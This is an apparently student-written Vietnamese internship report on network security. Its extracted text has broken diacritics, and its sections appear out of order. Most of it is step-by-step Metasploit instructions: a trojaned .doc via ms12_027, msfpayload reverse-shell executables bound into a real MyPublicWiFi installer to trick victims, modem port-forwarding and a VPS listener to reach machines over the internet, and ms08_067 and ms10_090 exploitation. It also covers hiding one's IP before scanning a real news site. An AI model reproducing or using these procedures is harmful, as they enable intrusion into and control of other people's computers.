Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
